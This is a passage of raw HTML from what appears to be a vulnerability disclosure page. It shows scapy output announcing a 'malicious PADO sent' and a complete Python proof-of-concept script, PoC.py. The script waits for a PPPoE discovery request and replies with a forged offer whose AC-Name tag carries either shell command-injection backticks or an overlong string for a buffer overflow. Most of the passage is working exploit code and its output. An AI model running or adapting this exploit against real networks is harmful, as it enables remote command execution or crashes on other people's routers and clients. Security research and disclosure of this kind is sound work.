class=\"crayon-s\">&#8216;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-56\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">End<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">List<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-58\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-59\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-60\"><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-61\"><span class=\"crayon-i\">Sent<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">packets<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-62\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hooray<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malicious <\/span><span class=\"crayon-e\">PADO <\/span><span class=\"crayon-v\">sent<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-e\">your <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">!<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-63\"><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-64\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">packet<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checking <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">PADI<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0063 seconds] -->  <\/p>\n<p><strong>PoC.py<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cd5140451019\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  # -*- coding: UTF-8 -*-    import sys  from scapy.all import *  import logging  logger = logging.getLogger(__name__)    # PPPoE Tag definition  class PPPoE_Tag(Packet):      name = &#8220;PPPoE Tag&#8221;      fields_desc = [ ShortEnumField(&#8216;tag_type&#8217;, None,                                     {0x0000: &#8216;End-Of-List&#8217;,                                      0x0101: &#8216;Service-Name&#8217;,                                      0x0102: &#8216;AC-Name&#8217;,                                      0x0103: &#8216;Host-Uniq&#8217;,                                      0x0104: &#8216;AC-Cookie&#8217;,                                      0x0105: &#8216;Vendor-Specific&#8217;,                                      0x0110: &#8216;Relay-Session-Id&#8217;,                                      0x0201: &#8216;Service-Name-Error&#8217;,                                      0x0202: &#8216;AC-System-Error&#8217;,                                      0x0203: &#8216;Generic-Error&#8217;}),                      FieldLenField(&#8216;tag_len&#8217;, None, length_of=&#8217;tag_value&#8217;, fmt=&#8217;H&#8217;),                      StrLenField(&#8216;tag_value&#8217;, &#8221;, length_from=lambda pkt:pkt.tag_len)]    # bind layers for auto-dissection  bind_layers(PPPoED, PPPoE_Tag, type=1)  bind_layers(PPPoE_Tag, Padding, tag_type=0)  bind_layers(PPPoE_Tag, PPPoE_Tag)    class Exploit(object):            def start(self, iface=&#8221;eth0&#8243;, cmd=&#8221;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8221;):          self.cmd = cmd          conf.iface = iface          logger.info(&#8220;sniffing on %r and trying to inject %r&#8221;%(conf.iface, cmd))          logger.info(&#8220;waiting for PPPoED PADI&#8230;&#8221;)          sniff(prn=self.attack, filter=&#8221;not tcp and not udp&#8221;)                def attack(self, pkt):          if PPPoE_Tag not in pkt or PPPoED not in pkt:              return          logger.info(&#8220;got PPPoED packet, checking if it is a PPPoED PADI&#8221;)          if pkt[PPPoED].code!=0x09: #PADI              return          logger.info(&#8220;PPPoED PADI detected, &#8220;)                    layer = pkt[PPPoED]          layer.show()          host_uniq = &#8220;&#8221;          while layer:              layer = layer.payload              if not layer:                  break                    logger.info(&#8220;-&gt; %s&#8221;%layer.name)              if not &#8220;PPoE&#8221; in layer.name:                  break                            if layer.name==&#8221;PPPoE Tag&#8221; and layer.tag_type==0x0103: # Host-Uniq                  host_uniq = layer.tag_value                  logger.info(&#8220;got host_uniq: %r&#8221;%host_uniq)                logger.info(&#8220;sending malicious PADO&#8230;&#8221;)          retp = Ether(dst=pkt[Ether].src, src=get_if_hwaddr(conf.iface))\/PPPoED(code=&#8217;PADO&#8217;)\/                     PPPoE_Tag(tag_type=&#8217;Service-Name&#8217;,tag_value=&#8221;lol&#8221;)\/                     PPPoE_Tag(tag_type=&#8217;Host-Uniq&#8217;,tag_value=host_uniq)\/                     PPPoE_Tag(tag_type=&#8221;AC-Cookie&#8221;,tag_value=&#8221;A&#8221;)\/                     PPPoE_Tag(tag_type=&#8217;AC-Name&#8217;,tag_value=self.cmd)\/                     PPPoE_Tag(tag_type=&#8221;End-Of-List&#8221;,tag_value=&#8221;&#8221;)          retp.show()          sendp(retp)          logger.info(&#8220;hooray, malicious PADO sent! :) check your target!&#8221;)          return False    if __name__==&#8221;__main__&#8221;:      logging.basicConfig(level=logging.DEBUG, format=&#8217;%(levelname)-8s &#8211; %(message)s&#8217;)      logger.setLevel(logging.DEBUG)            logger.info(&#8220;available interfaces:&#8221;)      for i in get_if_list():          logger.info(&#8221;   * %s&#8221;%i)                if not len(sys.argv)==2:          logger.warning(&#8220;missing cmdline options, check usage&#8221;)          print &#8220;&#8221;          print &#8220;usage: poc.py &lt;iface&gt;&#8221;          sys.exit(1)            ex = Exploit()      #ex.start(iface=sys.argv[1], cmd=&#8221;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8221;)  # VU1      ex.start(iface=sys.argv[1], cmd=&#8221;A&#8221;*1420) # VU2<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd5140451019-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd5140451019-92\">92<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-2\"><span class=\"crayon-p\"># -*- coding: UTF-8 -*-<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-5\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">scapy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">all <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">logging<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-7\"><span class=\"crayon-v\">logger<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getLogger<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-9\"><span class=\"crayon-p\"># PPPoE Tag definition<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-10\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Packet<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;PPPoE Tag&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fields_desc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ShortEnumField<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;tag_type&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-cn\">0x0000<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;End-Of-List&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0101<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Service-Name&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0102<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AC-Name&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0103<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Host-Uniq&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" 